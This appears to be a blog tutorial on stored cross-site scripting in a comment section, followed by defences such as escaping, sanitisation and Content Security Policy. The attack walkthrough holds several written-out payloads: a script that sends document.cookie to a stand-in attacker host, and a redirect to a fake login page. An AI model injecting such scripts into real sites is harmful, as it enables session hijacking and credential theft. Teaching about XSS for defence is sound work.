Cross-Site Scripting (XSS)

-

 

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a vulnerability that allows attackers to inject malicious JavaScript code into a website. When other users visit that website, their browser unknowingly runs the attacker's script. This can lead to data theft, account hijacking, or unwanted actions on behalf of the user.

Let's Understand with a Scenario

Scenario: A Comment Section with XSS Vulnerability

  1. Your Website’s Feature:

    • Your website (https://my-frontend.com) has a comment section.
    • Users can post comments, and these comments are displayed on the webpage.
    • The backend stores these comments in a database and renders them in HTML when users visit the page.

  2. The Vulnerability:

    • Your website doesn’t sanitize user input.
    • If a user submits any text, your backend or frontend directly displays it as-is on the page, without escaping special characters like < or >.

Step-by-Step Attack

Step 1: Attacker Identifies the Vulnerability

  • The attacker tests your comment section by entering something harmless-looking but suspicious:

    <script>alert('XSS Test')</script>
  • If the website is vulnerable, this script executes in the browser as soon as the page loads.
  • The attacker now knows your website has an XSS vulnerability.

Step 2: Attacker Injects Malicious Script

  • The attacker crafts a malicious payload, like:

    <script>
  fetch('https://attacker-website.com/steal?cookie=' + document.cookie);
</script>
  • The attacker submits this script as a comment on your website.
  • The comment gets stored in your database without being sanitized.

Step 3: Users Become Victims

  • When a legitimate user visits the page to view comments, the browser:
    • Loads the malicious comment.
    • Executes the attacker’s script because the input wasn’t sanitized.

Step 4: The Attack in Action

  • The attacker’s script runs in the victim’s browser.
  • What can the attacker do?
    • Steal cookies: If your site uses cookies for authentication, the attacker can steal them.
      • Example:

        fetch('https://attacker-website.com/steal?cookie=' + document.cookie);
    • Redirect the user: The attacker might redirect the user to a fake login page to steal their credentials.
      • Example:

        window.location = 'https://attacker-website.com/login';
    • Perform unwanted actions: The attacker might send requests to your server on behalf of the user.
      • Example: Changing the user’s profile information or making purchases.

Step-by-Step: How an XSS Attack Plays Out

  1. Attacker:

    • Submits a malicious script via the comment form on your website.

  2. Your Server:

    • Stores the malicious comment in the database without sanitizing it.

  3. Victim’s Browser:

    • Loads the webpage.
    • Fetches all comments, including the attacker’s script.
    • Executes the attacker’s JavaScript.

  4. Attack is Executed:

    • The malicious script runs in the victim’s browser.
    • Data is stolen, or harmful actions are performed.

How the Attack Looks in the Browser

  1. Victim visits: https://my-frontend.com/comments.
  2. The browser fetches and displays:

    <div class="comment">Nice post!</div>
<div class="comment">
  <script>
    fetch('https://attacker-website.com/steal?cookie=' + document.cookie);
  </script>
</div>
  3. The attacker’s script is executed in the victim’s browser.

What the Attacker Gains

  1. Stolen Cookies:

    • If your site uses cookies for authentication, the attacker now has access to the user’s session.

  2. User Impersonation:

    • With stolen cookies, the attacker can log in as the victim and perform actions on their behalf.

  3. User Redirection:

    • The attacker might redirect the victim to a phishing page to steal their credentials.

  4. Data Harvesting:

    • The attacker can scrape sensitive data from the webpage using JavaScript.

How to Protect Your Website from XSS

1. Sanitize Input

  • Before storing user input, remove any harmful scripts or tags.
  • Use libraries like DOMPurify (for frontend) or input sanitization frameworks in your backend.

2. Escape Output

  • When displaying user input on the page, escape special characters:
    • <&lt;
    • >&gt;
    • Example in JavaScript:

      function escapeHTML(str) {
  return str.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

3. Use Content Security Policy (CSP)

  • Add a Content-Security-Policy header to restrict JavaScript execution:

    Content-Security-Policy: default-src 'self'; script-src 'self';
  • This blocks inline scripts and prevents external scripts from unauthorized sources.

4. Avoid innerHTML

  • Never insert user input directly into the DOM with innerHTML.
  • Instead, use safer alternatives like textContent or templating libraries that escape data automatically.

5. Validate Input

  • On both the frontend and backend, ensure input matches expected formats (e.g., only allow letters and numbers for usernames).

Comments

Post a Comment

Popular posts from this blog

JavaScript Must-Read Topics for Senior Developer Interviews

-
JavaScript Must-Read Topics for Senior Developer Interviews Core JavaScript Variables and Scoping ( var , let , const ) ✅ Hoisting✅ Closures✅ The Event Loop✅ Promises✅ and Async/Await✅ Callbacks✅ Prototype and Prototypal Inheritance✅ this Keyword and Binding✅ Execution Context and Call Stack✅ Error Handling ( try-catch , finally , custom errors)✅ ES6+ Features (Destructuring✅, Spread/Rest✅, Arrow Functions✅, etc.) Type Coercion and Type Checking ✅ == vs ===  ✅ Object-Oriented Programming in JavaScript (Classes, Constructors)✅ Functional Programming Concepts (Higher-Order Functions✅, Pure Functions✅, Immutability✅) Module Systems ( require , import/export , CommonJS, ESModules)✅ JavaScript Design Patterns (Singleton, Factory, Observer, etc.) Garbage Collection✅ Advanced Topics Currying✅ Memoization✅ Throttling and Debouncing✅ Event Bubbling , Event Capturing and Event Delegation✅ Shadow DOM and Web Components Iterators, Iterables and Generator✅ WeakMap and WeakSet✅ Proxy and...
Read more

React.js Topics for a Mid-Senior Level Developer Interview Preparation

-
  React.js Topics for a Mid-Senior Level Developer Interview Preparation 1. Core Concepts React Component Types (Class vs Functional Components)✅ JSX and Rendering Elements✅ Props and Prop Validation✅ State Management (useState, class-based state)✅ Lifecycle Methods vs Hooks (useEffect)✅ 2. Advanced React Context API✅ Higher-Order Components (HOC)✅ Render Props✅ React Portals✅ Refs (createRef✅, useRef✅, forwardRef✅) Error Boundaries✅ Suspense and Lazy Loading✅ Strict Mode✅ Concurrent Rendering✅ 3. React Hooks Basic Hooks: useState, useEffect✅ Advanced Hooks: useContext✅, useReducer✅, useMemo✅, useCallback✅, useRef✅, useLayoutEffect✅ Custom Hooks (Creation and Use Cases)✅ 4. React Performance React.memo and useMemo✅ React Profiler Avoiding Re-renders (key, memoization, and immutability)✅ Code Splitting and Lazy Loading✅ Virtual DOM and Reconciliation✅ 5. Routing React Router (v6+): Route Configurations✅ Nested Routing✅ Dynamic Routing✅ Programmatic Navigation (useNavigate, useParams...
Read more

Must read Topics for Mid Level Node.js Developer Interview Preparation

-
  Must read Topics for Mid Level Node.js Developer Interview Preparation 1. Core Node.js Fundamentals Node.js Architecture (Single-threaded, Event Loop, Non-blocking I/O)✅ Understanding require and ES Modules ( import/export )✅ Core Modules: fs path os events http / https stream (Readable, Writable, Transform, Duplex) Process Management: process (environment variables, process.nextTick , process.exit ) Handling Uncaught Exceptions Timers ( setTimeout , setInterval , setImmediate ) Working with Buffers Working with the File System ( fs.promises , async/await with fs ) Child Processes ( child_process , exec , spawn , fork ) 2. Package Management with npm and Yarn Managing dependencies ( package.json , package-lock.json )✅ Semantic Versioning ( ^ , ~ , exact versions)✅ Local vs. global packages✅ Scripts in package.json (e.g., npm run dev )✅ Using npx ✅ 3. Asynchronous Programming Callbacks✅ Promises✅ async/await ✅ Event Emitters Streams and Pipelining Error handling in async code...
Read more